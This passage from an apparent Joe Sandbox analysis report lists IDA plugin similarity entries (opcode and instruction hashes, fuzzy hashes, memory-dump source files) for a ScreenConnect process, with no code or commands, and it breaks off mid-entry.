                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 9685229fdb58bf0e8cd3f3079d8bddb3f808fdf2116ef1b08ede690f1df47013
                                                                                                                                                                                                                                                    • Instruction ID: 8fffeab30e04acefcca53033d70465d2962d6c5b771b88c28369e26df5b434ba
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9685229fdb58bf0e8cd3f3079d8bddb3f808fdf2116ef1b08ede690f1df47013
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9E09B74D001055B8B40DFFC9745459BBF0DA09214B288699945AD7791F732950347E1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 8ecd040df462a3843260686ff2d4e0c616c414a4f25315bc79ee3b975aff70d1
                                                                                                                                                                                                                                                    • Instruction ID: deaa3eb9b92e90a5f20136a5e110a3175626dae1b74f59003d02dcc01c1306c3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ecd040df462a3843260686ff2d4e0c616c414a4f25315bc79ee3b975aff70d1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53F0E53080A285CFC711DFF8D94486A3FB1EF8730474842CBC4549B1A2C6289912FBE2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: $]q$$]q
                                                                                                                                                                                                                                                    • API String ID: 0-127220927
                                                                                                                                                                                                                                                    • Opcode ID: 675c2325fe958ecaaa79563337925dee7231318e4c2aeb7c2e72ea9f4aa8a88b
                                                                                                                                                                                                                                                    • Instruction ID: ce98491961edd4242f48e0e7cee3280e4bdda14545528ce805ac16812f667f8a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 675c2325fe958ecaaa79563337925dee7231318e4c2aeb7c2e72ea9f4aa8a88b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ABD05E307802088F973CCE2DD98091173E8FF44E023A104E9DA458B23ACB20FC41C755
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                                                                    • API String ID: 0-2564639436
                                                                                                                                                                                                                                                    • Opcode ID: f561c61c4aecabe9c70de33462d83505726ce6b296ecbd6a57a317b6c013e7de
                                                                                                                                                                                                                                                    • Instruction ID: 76f83f3c8e8cb7c2b8970307483ffafcfe7dffc33ad5ef1dd877db7696ad5029
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f561c61c4aecabe9c70de33462d83505726ce6b296ecbd6a57a317b6c013e7de
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79D17374A40715CFCB08DF68D884A99B7B6FF49710B1186A9E919AB365DB30FC85CF80
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: (aq
                                                                                                                                                                                                                                                    • API String ID: 0-600464949
                                                                                                                                                                                                                                                    • Opcode ID: aa797ab6a931d68e890d13a6239695bd4f1d597aefb1d05e36b5d7b206200f17
                                                                                                                                                                                                                                                    • Instruction ID: 0da3159117cb81bcebac55ec424162c30dd6a41f7114095c5798a01b33035445
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa797ab6a931d68e890d13a6239695bd4f1d597aefb1d05e36b5d7b206200f17
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C611834B102159FDB18DF68D99496EB7B6FF8D715B1090A8E506AB365DB30EC02DF40
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: LR]q
                                                                                                                                                                                                                                                    • API String ID: 0-3081347316
                                                                                                                                                                                                                                                    • Opcode ID: be793ff7c78155e66e9cf459a48484f74916b7dce1045d982b7c9017c1d86bef
                                                                                                                                                                                                                                                    • Instruction ID: 12e103d78737e5db608518c800da1ca0389fbc04f36b347c6c7245c63793b75b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be793ff7c78155e66e9cf459a48484f74916b7dce1045d982b7c9017c1d86bef
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E51D430B002169FDB299B78D85476EBBE2FF84B11F1489ADE846DB291EB349C85C741
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: $]q
                                                                                                                                                                                                                                                    • API String ID: 0-1007455737
                                                                                                                                                                                                                                                    • Opcode ID: f06f809a23e595e801ef04a55bc5119596f8be791c3091ad73c6353b0f011a2b
                                                                                                                                                                                                                                                    • Instruction ID: 0cbdbc56cf0ab8ac5f72c6ecc363af4678359723c3d865f9a3924bddd8dbe8b1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f06f809a23e595e801ef04a55bc5119596f8be791c3091ad73c6353b0f011a2b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92517130A0071ACFDB19DFB8C458A6DBBB1FF54704F1085ADD419AB265EB74D885CB80
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: nCuq
                                                                                                                                                                                                                                                    • API String ID: 0-4247494828
                                                                                                                                                                                                                                                    • Opcode ID: 2d49dc8a8b0990eccfacacf4b9eef2257efab7bac2c1e5dbeb09f150f4b6f8bb
                                                                                                                                                                                                                                                    • Instruction ID: acc01ff868e218fcc2dbb0782ad557bb331195fea1b1dbd891439ef1613bc64f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d49dc8a8b0990eccfacacf4b9eef2257efab7bac2c1e5dbeb09f150f4b6f8bb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B518230B402068FDB2DEB39D954A6E77E6EF88A14B1044B8E506DB365EF74EC05CB91
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: nCuq
                                                                                                                                                                                                                                                    • API String ID: 0-4247494828
                                                                                                                                                                                                                                                    • Opcode ID: 7d0c4d942ac2b3796dacae273d771b7d928ff4ebf3c48ef2ceab2ec9c9f15376
                                                                                                                                                                                                                                                    • Instruction ID: 74653fdacfd3fef63d6d8e3d4d77824042828648a3f3465912c1b56e01c95576
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d0c4d942ac2b3796dacae273d771b7d928ff4ebf3c48ef2ceab2ec9c9f15376
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12515F70B402068FDB29EB39D554A6E77E6EF88A00B1444BCE506DB365EF74EC06CB91
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 47a91f15804aa7dd34669ad42bbbf2d5bcf69ba9db828c13cc5289502df0657e
                                                                                                                                                                                                                                                    • Instruction ID: 474f5814d2e8e8cbc0939567072028cc32fc032287e6380aeace1bd41605db98
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47a91f15804aa7dd34669ad42bbbf2d5bcf69ba9db828c13cc5289502df0657e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A518D34B002058FDB19DF6CD59496ABBEAFF8830471485ADE54ACB366DB34EC06CB91
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 8c493db03da99af4a86d6d20f1672d2777000dfd20d5fdbf901a1ca4818d84be
                                                                                                                                                                                                                                                    • Instruction ID: 46dd3d24d4a6099872bec6ca96b81a47cba7784a8daf4c0f4ecbb1be4964b8c3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c493db03da99af4a86d6d20f1672d2777000dfd20d5fdbf901a1ca4818d84be
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF51E1746047408FC738DF69D880596BBF5EF86720B044AADD096CB6A6D734E90BCBC0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 2cf3780e77e27738dfa771879c0953085beb18edc964598974a2f44b84c76ab4
                                                                                                                                                                                                                                                    • Instruction ID: 13d73acf7a71b3cbac2fe997977012b6f9048cdd45aa6864c7d857a993425a6f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2cf3780e77e27738dfa771879c0953085beb18edc964598974a2f44b84c76ab4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20514D34B002058FDB18DF6CD99492ABBEAFF8830471485A9E54ADB365DB74EC06CB91
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 1f1554ce19558ee06d21f885e69ca81641b94670272cf18be9ac406ab3071414
                                                                                                                                                                                                                                                    • Instruction ID: f97aaace72217b711728769d70ae60d5e22dcfc9ded9937dd8dca03d5395dfad
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f1554ce19558ee06d21f885e69ca81641b94670272cf18be9ac406ab3071414
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65512A34600601CFD728DF29D98495AB7F2FF8D725B245A6CE49A9B7A4DB31F806CB40
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: f322b0e2b305c50b0060923035d191f95b05035e1107ba891730787563a584ba
                                                                                                                                                                                                                                                    • Instruction ID: 68c7384bbb72668babfe3baee2b73007768a8a1c8780f8ecd9d309a74a8c2f0b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f322b0e2b305c50b0060923035d191f95b05035e1107ba891730787563a584ba
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C51BE30E403098FDB05DFB9D944B9DBBB5FF89300F1085A9E404BB295DB78A885CB90
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7110ae4bccaed907d904e7cb14823a2e519c29a7a0a8921c98e754c3d3b5598e
                                                                                                                                                                                                                                                    • Instruction ID: 61e1e16697e1aadc98f2f4b7fac9bdf4f0b30ac2f02566108ceca481929e7fd0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7110ae4bccaed907d904e7cb14823a2e519c29a7a0a8921c98e754c3d3b5598e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25518E70E403099FDB05DFA5D944BDDBBB5FF88300F5085A9E504BB254DB78A986CB50
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 11402537694d019e7a54bc71f6723c06db1691064f6ed74b0bb12ff51d34a114
                                                                                                                                                                                                                                                    • Instruction ID: 89fc0b654861719be2b440744e6162ec5a32d286bc14938ca096e8ce075833be
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11402537694d019e7a54bc71f6723c06db1691064f6ed74b0bb12ff51d34a114
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4415771E002199BDB18DFA5C980AEEBBF6FF89B00F14816DD505B7240DB74AD46CB91
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: a696733ccf2b95d50d6d764bd4fca705d9bfa921fc1f094cb17e8a056aa69818
                                                                                                                                                                                                                                                    • Instruction ID: 9d1f65799c976b9beebe01b5720e59aba023aa3fa80bf4b0bb717c03f8e8a7ad
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a696733ccf2b95d50d6d764bd4fca705d9bfa921fc1f094cb17e8a056aa69818
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27416B306102058FDB18DB69D854AADBBE6FF88B14B1485ADE406EB361DF74AD06CB90
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: adde603b9fb62feee559975771c63714999b66ae5ba63482342fa341dd5bdab1
                                                                                                                                                                                                                                                    • Instruction ID: 7d7954bfba48e9e2d4fe2f8ae114d417af2f036f4b5cd1894699bd6aa9e0b6d5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: adde603b9fb62feee559975771c63714999b66ae5ba63482342fa341dd5bdab1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34210731B002415FEB09DB38D990BAD7BE6EFD6210F08956AD4089B365DF74AD05C7D2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3288812848.0000000001B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B6D000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1b6d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7459fe353517ab239a0a3f77f26eaaa57d744d914f30d95157a39c34336a1b1b
                                                                                                                                                                                                                                                    • Instruction ID: 5ff76935c1bc1e4d8ea6e5e8b6b570c7f46e640668712e31a8c3c8c2a3eeb013
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7459fe353517ab239a0a3f77f26eaaa57d744d914f30d95157a39c34336a1b1b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B214871200240DFCB09CF54D9C0F26BF69FBA8314F2486A9E9490B256C33ED416CBA2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 59efccaccee5938a83eb7406449b5a2aa15d7c04e0f61455cb6c30a8569efec4
                                                                                                                                                                                                                                                    • Instruction ID: 5e4de3aeb4807b51ed773a1e4105aff6c3da24a2a4eaaa2df5f53743e718b706
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59efccaccee5938a83eb7406449b5a2aa15d7c04e0f61455cb6c30a8569efec4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6821B0317002058FDB04DB68D9819AEBBF5FF89710B1085BAD5099B365DB34FC16CB91
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: cd611041529d4f4589abbd3447d2fa7a828146590362a878cc66a7e055f2f11a
                                                                                                                                                                                                                                                    • Instruction ID: 2dfa73ed86ec28398267e9bf321c24e087f9689f0c68c457ce29070b3e727da0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd611041529d4f4589abbd3447d2fa7a828146590362a878cc66a7e055f2f11a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4521A471A002059FDB04DF64D8819AEBBF9FF88310B10857AD509DB325DB38ED16CB91
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: df6c7e62e59d82e0eeff3c3def2ad1c7295406449c74fb9f8108ee58acdfd510
                                                                                                                                                                                                                                                    • Instruction ID: 161552a8dc005e6c8b7926ad1ff57884b5c6cff2b601bf95455aae0368f4f231
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df6c7e62e59d82e0eeff3c3def2ad1c7295406449c74fb9f8108ee58acdfd510
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A41138A7D0E2C2CFC71AA73898684D07F64EE6794170905DFE185CF267E3458406CB42
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: cdbb6b939dee2e70031700ff170b493a8c9f24f4a14706a17dae9d688d91bc0f
                                                                                                                                                                                                                                                    • Instruction ID: b032c6c6bbad234b2e210a05a95920ac9a86604ae7a8c921b8c46c432b8e2827
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cdbb6b939dee2e70031700ff170b493a8c9f24f4a14706a17dae9d688d91bc0f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B11E0A6A4D3C55FD7068728D891995BF65EF93220B1A80DFD489CF1A3D628D907C321
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7bc202935839ceb2c55e253aae27404060584fc9bfc217badaa8971e244c7ae9
                                                                                                                                                                                                                                                    • Instruction ID: 6c08d95767f33b5100040d57da72b42cc31875346e8dd8b5012344604d2b4ced
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bc202935839ceb2c55e253aae27404060584fc9bfc217badaa8971e244c7ae9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D213E302006058FD738DF29D84459ABBF5EF88720B108B6DD5939B6A5EB31E95ACF90
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 8b91b2297b64e004689f28bb91848824e4dc48dbe6aff9a41b0122397ca49ce0
                                                                                                                                                                                                                                                    • Instruction ID: 05010e52956398ec6d9cd0b8500a5a43a08c09c208b4f5067b7578d487b23c28
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b91b2297b64e004689f28bb91848824e4dc48dbe6aff9a41b0122397ca49ce0
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7dc6298c7e94a5d7451994e58ec359ea1ae76b4a65ca288e13371d7ff0ae32dd
                                                                                                                                                                                                                                                    • Instruction ID: 5ed162268cabcd92f4ae97d5c18763393033f67c12b4a66a48024d627372b327
